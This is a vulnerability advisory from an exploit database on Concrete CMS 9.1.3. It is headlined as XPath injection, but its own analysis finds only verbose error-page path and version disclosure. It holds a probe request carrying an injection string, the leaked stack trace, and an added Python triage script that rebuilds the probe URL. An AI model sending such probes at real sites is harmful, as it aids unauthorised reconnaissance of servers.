Concrete5 CME v9.1.3 – Xpath injection

  • Author: nu11secur1ty
    Date: 2023-03-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51144/
  • ## Exploit Title: Concrete5 CME v9.1.3 - Xpath injection
    ## Author: nu11secur1ty
    ## Date: 11.28.2022
    ## Vendor: https://www.concretecms.org/
    ## Software: https://www.concretecms.org/download
    ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3
    
    ## Description:
    The third URL path segment (the one directly after `index.php/`; the scanner output calls it path folder `3`) is reported as vulnerable to XPath injection: the test payload `50539478' or 4591=4591--` was placed in that segment and the server answered with an error page instead of a normal 404. Read the response below carefully before accepting that label. The request is routed to the page-not-found controller; while the 404 template renders, a translation lookup goes through the Stash file-cache driver, an `include()` of a cache file fails, and the resulting uncaught `ErrorException` is rendered in full by the Whoops handler. No XPath evaluation appears anywhere in the stack trace, so the impact the evidence supports is verbose error disclosure: the absolute path of the web root, the application cache directory and the PHP installation, plus exact Apache, OpenSSL and PHP versions from the `Server` and `X-Powered-By` headers. An attacker can repeat such requests to map the directory layout of the content served from this host (internal or external storage alike), and every request costs the server a full error-page render, which can be used to load the system. The Whoops page only appears when the site is configured to show errors in the page; with that setting off a generic error page is returned.
    
    ## STATUS: HIGH Vulnerability
    
    [+] Exploits:
    00:
    ```http
    GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1
    Host: pwnedhost.com
    Accept-Encoding: gzip, deflate
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 0
    ```
    
    [+] Response:
    
    ```http
    HTTP/1.1 500 Internal Server Error
    Date: Mon, 28 Nov 2022 15:32:22 GMT
    Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
    X-Powered-By: PHP/7.4.30
    Connection: close
    Content-Type: text/html;charset=UTF-8
    Content-Length: 592153
    
    <!DOCTYPE html><!--
    
    
    Whoops\Exception\ErrorException: include(): Failed opening
    &#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php&#039;
    for inclusion (include_path=&#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR&#039;)
    in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php
    on line 26
    Stack trace:
    1. Whoops\Exception\ErrorException->()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
    2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
    3. Stash\Driver\FileSystem\NativeEncoder->deserialize()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201
    4. Stash\Driver\FileSystem->getData()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631
    5. Stash\Item->getRecord()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321
    6. Stash\Item->executeGet()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252
    7. Stash\Item->get()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346
    8. Stash\Item->isMiss()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67
    9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356
     10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601
     11. Laminas\I18n\Translator\Translator->loadMessages()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434
     12. Laminas\I18n\Translator\Translator->getTranslatedMessage()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349
     13. Laminas\I18n\Translator\Translator->translate()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69
     14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27
     15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47
     16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267
     17. Concrete\Core\Block\View\BlockView->renderViewContents()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
     18. Concrete\Core\View\AbstractView->render()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853
     19. Concrete\Core\Area\Area->display()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128
     20. Concrete\Core\Area\GlobalArea->display()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11
     21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125
     22. Concrete\Core\View\View->inc()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4
     23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329
     24. Concrete\Core\View\View->renderTemplate()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291
     25. Concrete\Core\View\View->renderViewContents()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
     26. Concrete\Core\View\AbstractView->render()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19
     27. Concrete\Controller\SinglePage\PageNotFound->view()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
     28. call_user_func_array()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
     29. Concrete\Core\Controller\AbstractController->runAction()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188
     30. Concrete\Core\Http\ResponseFactory->controller()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95
     31. Concrete\Core\Http\ResponseFactory->notFound()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390
     32. Concrete\Core\Http\ResponseFactory->collectionNotFound()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234
     33. Concrete\Core\Http\ResponseFactory->collection()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132
     34. Concrete\Core\Http\DefaultDispatcher->handleDispatch()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60
     35. Concrete\Core\Http\DefaultDispatcher->dispatch()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39
     36. Concrete\Core\Http\Middleware\DispatcherDelegate->next()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39
     37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
     38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36
     39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
     40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36
     41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
     42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35
     43. Concrete\Core\Http\Middleware\CookieMiddleware->process()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
     44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29
     45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
     46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86
     47. Concrete\Core\Http\Middleware\MiddlewareStack->process()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85
     48. Concrete\Core\Http\DefaultServer->handleRequest()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125
     49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102
     50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run()
    C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45
     51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2
    
    
    --><html>
    <head>
    <meta charset="utf-8">
    <meta name="robots" content="noindex,nofollow"/>
    <meta name="viewport" content="width=device-width,
    initial-scale=1, shrink-to-fit=no"/>
    <title>Concrete CMS has encountered an issue.</title>
    
    .......
    
    ```
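The following triage script is an added example; it is not code from the advisory, from its author, or from Concrete CMS. `build_probe_url()` rebuilds the advisory's request URL from the reported payload, and `triage()` takes a captured Whoops page and reports what the trace really contains: the exception that fired, the stack frames, every absolute server path the page leaks, and whether any XPath evaluation is involved. `SAMPLE_RESPONSE` is a constructed excerpt of the response shown above with most frames trimmed; the function names and the verdict strings are this example's own.

```python
"""Triage a Whoops error page such as the one in the advisory above.

Added example, not code from the advisory or from Concrete CMS. It answers
the question a reviewer should ask of this finding: does the trace show an
XPath evaluation, or only an unrelated exception that leaks server paths?
"""
import html
import re
from urllib.parse import quote

# Payload as reported in the advisory; the trailing space was sent as %20.
PAYLOAD = "50539478' or 4591=4591-- "

# Constructed excerpt of the advisory's response (frames trimmed, paths verbatim).
SAMPLE_RESPONSE = r"""<!DOCTYPE html><!--
Whoops\Exception\ErrorException: include(): Failed opening
&#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php&#039;
for inclusion (include_path=&#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR&#039;)
in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php
on line 26
Stack trace:
1. Whoops\Exception\ErrorException->()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
3. Stash\Driver\FileSystem\NativeEncoder->deserialize()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201
27. Concrete\Controller\SinglePage\PageNotFound->view()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2
--><html><head><title>Concrete CMS has encountered an issue.</title>"""

# First "Class\Name(Exception|Error): message" line of the Whoops comment block.
EXC_LINE = re.compile(r"^([\w\\]+(?:Exception|Error)): (.+)$", re.M)
# Numbered frames: "12. Some\Class->method()" possibly followed by a file:line.
FRAME = re.compile(r"^[ \t]*\d+\. (\S+)", re.M)
# Absolute paths, Windows drive-letter style and POSIX style.
WIN_PATH = re.compile(r"[A-Za-z]:[\\/][^\s'\"&;<>()]+")
NIX_PATH = re.compile(r"(?<![\w:])/(?:[\w.-]+/)+[\w.-]+")


def build_probe_url(base, prefix="ccm", suffix="assets/localization/moment/js"):
    """Place the payload in the path segment right after index.php/, as the advisory did."""
    # safe="'" keeps the apostrophe literal, matching the original request.
    encoded = quote(PAYLOAD, safe="'")
    return f"{base}/index.php/{prefix}{encoded}/{suffix}"


def triage(body):
    """Classify a captured error page; the dict is what a report should cite."""
    text = html.unescape(body)          # &#039; -> ' so paths are contiguous
    exc = EXC_LINE.search(text)
    frames = FRAME.findall(text)
    paths = sorted(set(WIN_PATH.findall(text)) | set(NIX_PATH.findall(text)))
    # The only evidence of XPath would be a DOMXPath frame or an XPath error message.
    mentions_xpath = "xpath" in text.lower()
    if exc is None:
        verdict = "no stack trace in body"
    elif mentions_xpath:
        verdict = "xpath error surfaced"
    else:
        verdict = "verbose error page: path disclosure, no XPath involvement"
    return {
        "exception": exc.group(1) if exc else None,
        "message": exc.group(2) if exc else None,
        "frames": frames,
        "paths": paths,
        "mentions_xpath": mentions_xpath,
        "verdict": verdict,
    }


def webroot(paths):
    """Guess the document root from the frame that points at index.php."""
    for p in paths:
        m = re.match(r"(.*)[\\/]index\.php(?::\d+)?$", p)
        if m:
            return m.group(1)
    return None


if __name__ == "__main__":
    print(build_probe_url("http://pwnedhost.com/concrete-cms-9.1.3"))
    result = triage(SAMPLE_RESPONSE)
    print(result["verdict"])
    print("webroot:", webroot(result["paths"]))
    for p in result["paths"]:
        print("leaked:", p)
```

Run it against a real capture by replacing `SAMPLE_RESPONSE` with the saved response body; a `mentions_xpath` of `False` together with a non-empty `paths` list is the signature of the case shown above, and the `verdict` string is the line to put in the finding instead of the scanner's label.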
    
    
    ## Reproduce:
    [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)
    
    ## Proof and Exploit:
    [href](https://streamable.com/4f60ka)
    
    ## Time spent
    `03:00:00`
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.html and https://www.exploit-db.com/
    home page: https://www.nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
    nu11secur1ty <http://nu11secur1ty.com/>